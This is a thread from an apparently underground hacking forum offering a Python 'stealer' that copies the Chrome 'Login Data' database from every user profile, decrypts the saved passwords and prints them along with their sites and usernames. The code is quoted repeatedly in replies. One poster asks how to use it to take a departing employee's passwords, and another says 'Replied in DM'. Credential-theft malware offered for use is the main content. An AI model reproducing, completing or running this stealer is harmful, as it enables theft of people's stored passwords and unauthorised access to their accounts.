Stealer Paswords Chrome
by discordlate - Monday December 25, 2023 at 09:37 PM
#1
A phyton script to get all passwords of chrome.

Main function:

def main():
    key = get_encryption_key()
    profiles_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
                                "Google", "Chrome", "User Data")
    profiles = [os.path.join(profiles_path, p) for p in os.listdir(profiles_path)
                if os.path.isdir(os.path.join(profiles_path, p)) and "Profile" in p]
    for profile in profiles:
        try:
            filename = os.path.join(profile, "Login Data")
            shutil.copyfile(filename, "ChromeData.db")
            db = sqlite3.connect("ChromeData.db")
            cursor = db.cursor()
            cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")
            for row in cursor.fetchall():
                origin_url = row[0]
                action_url = row[1]
                username = row[2]
                password = decrypt_password(row[3], key)
                date_created = row[4]
                date_last_used = row[5]       
                if username or password:
                    print(f"Origin URL: {origin_url}")
                    print(f"Action URL: {action_url}")
                    print(f"Username: {username}")
                    print(f"Password: {password}")
                else:
                    continue
                if date_created != 86400000000 and date_created:
                    print(f"Creation date: {str(get_chrome_datetime(date_created))}")
                if date_last_used != 86400000000 and date_last_used:
                    print(f"Last Used: {str(get_chrome_datetime(date_last_used))}")
                print("="*50)
            cursor.close()
            db.close()
            try:
                os.remove("ChromeData.db")
            except:
                pass
        except Exception as e:
            print(f"Error accessing '{profile}': {str(e)}")

Hidden Content
You must register or login to view this content.
Reply
#2
(Dec 25, 2023, 09:37 PM)discordlate Wrote: A phyton script to get all passwords of chrome.

Main function:

def main():
    key = get_encryption_key()
    profiles_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
                                "Google", "Chrome", "User Data")
    profiles = [os.path.join(profiles_path, p) for p in os.listdir(profiles_path)
                if os.path.isdir(os.path.join(profiles_path, p)) and "Profile" in p]
    for profile in profiles:
        try:
            filename = os.path.join(profile, "Login Data")
            shutil.copyfile(filename, "ChromeData.db")
            db = sqlite3.connect("ChromeData.db")
            cursor = db.cursor()
            cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")
            for row in cursor.fetchall():
                origin_url = row[0]
                action_url = row[1]
                username = row[2]
                password = decrypt_password(row[3], key)
                date_created = row[4]
                date_last_used = row[5]       
                if username or password:
                    print(f"Origin URL: {origin_url}")
                    print(f"Action URL: {action_url}")
                    print(f"Username: {username}")
                    print(f"Password: {password}")
                else:
                    continue
                if date_created != 86400000000 and date_created:
                    print(f"Creation date: {str(get_chrome_datetime(date_created))}")
                if date_last_used != 86400000000 and date_last_used:
                    print(f"Last Used: {str(get_chrome_datetime(date_last_used))}")
                print("="*50)
            cursor.close()
            db.close()
            try:
                os.remove("ChromeData.db")
            except:
                pass
        except Exception as e:
            print(f"Error accessing '{profile}': {str(e)}")

I have an employee at my job who is about to be fired. She is purposely holding some logins and passwords hostage on purpose because she senses the end is near for her on the job. How can I use this code to retrieve some passwords to some important chrome based logins? Thanks in advance.
Reply
#3
(Aug 24, 2024, 12:41 PM)bingiedred Wrote:
(Dec 25, 2023, 09:37 PM)discordlate Wrote: A phyton script to get all passwords of chrome.

Main function:

def main():
    key = get_encryption_key()
    profiles_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
                                "Google", "Chrome", "User Data")
    profiles = [os.path.join(profiles_path, p) for p in os.listdir(profiles_path)
                if os.path.isdir(os.path.join(profiles_path, p)) and "Profile" in p]
    for profile in profiles:
        try:
            filename = os.path.join(profile, "Login Data")
            shutil.copyfile(filename, "ChromeData.db")
            db = sqlite3.connect("ChromeData.db")
            cursor = db.cursor()
            cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")
            for row in cursor.fetchall():
                origin_url = row[0]
                action_url = row[1]
                username = row[2]
                password = decrypt_password(row[3], key)
                date_created = row[4]
                date_last_used = row[5]       
                if username or password:
                    print(f"Origin URL: {origin_url}")
                    print(f"Action URL: {action_url}")
                    print(f"Username: {username}")
                    print(f"Password: {password}")
                else:
                    continue
                if date_created != 86400000000 and date_created:
                    print(f"Creation date: {str(get_chrome_datetime(date_created))}")
                if date_last_used != 86400000000 and date_last_used:
                    print(f"Last Used: {str(get_chrome_datetime(date_last_used))}")
                print("="*50)
            cursor.close()
            db.close()
            try:
                os.remove("ChromeData.db")
            except:
                pass
        except Exception as e:
            print(f"Error accessing '{profile}': {str(e)}")

I have an employee at my job who is about to be fired. She is purposely holding some logins and passwords hostage on purpose because she senses the end is near for her on the job. How can I use this code to retrieve some passwords to some important chrome based logins? Thanks in advance.

Replied in DM
Reply
#4
I love this kind of sharing, it's easy to get inspired.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply
#5
...................................
Reply
#6
let see this manito
Reply
#7
good job bro thank you

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply
#8
(Dec 25, 2023, 09:37 PM)discordlate Wrote: A phyton script to get all passwords of chrome.

Main function:

def main():
    key = get_encryption_key()
    profiles_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
                                "Google", "Chrome", "User Data")
    profiles = [os.path.join(profiles_path, p) for p in os.listdir(profiles_path)
                if os.path.isdir(os.path.join(profiles_path, p)) and "Profile" in p]
    for profile in profiles:
        try:
            filename = os.path.join(profile, "Login Data")
            shutil.copyfile(filename, "ChromeData.db")
            db = sqlite3.connect("ChromeData.db")
            cursor = db.cursor()
            cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")
            for row in cursor.fetchall():
                origin_url = row[0]
                action_url = row[1]
                username = row[2]
                password = decrypt_password(row[3], key)
                date_created = row[4]
                date_last_used = row[5]       
                if username or password:
                    print(f"Origin URL: {origin_url}")
                    print(f"Action URL: {action_url}")
                    print(f"Username: {username}")
                    print(f"Password: {password}")
                else:
                    continue
                if date_created != 86400000000 and date_created:
                    print(f"Creation date: {str(get_chrome_datetime(date_created))}")
                if date_last_used != 86400000000 and date_last_used:
                    print(f"Last Used: {str(get_chrome_datetime(date_last_used))}")
                print("="*50)
            cursor.close()
            db.close()
            try:
                os.remove("ChromeData.db")
            except:
                pass
        except Exception as e:
            print(f"Error accessing '{profile}': {str(e)}")

Is it real or just a joke ?
is it real or just a joke ?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply
#9
(Dec 10, 2024, 01:47 AM)myfriendhola58 Wrote: Is it real or just a joke ?
is it real or just a joke ?

It is real, you can try on you computer
Reply
#10
Thanks sir for this information

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] Database Searcher Telegram odanbtw 1,004 80,121 Apr 24, 2026, 12:13 PM
Last Post: FAKE_NBOBN00
  ✅ Top 10 Google Dorks For SQL Injections NextSoftGroup 9 206 Apr 24, 2026, 02:54 AM
Last Post: elliotalderson4
  [2026] Bypass AV / EDR Spearr 62 758 Apr 24, 2026, 02:44 AM
Last Post: elliotalderson4
  Cardable Giftcard Websites AKASHIC 8 224 Feb 10, 2026, 01:08 PM
Last Post: mreai
  0day-Mari Bot Godfather1 75 6,679 Feb 10, 2026, 12:00 PM
Last Post: asdasdasdadasda

Forum Jump:


 Users browsing this forum: 1 Guest(s)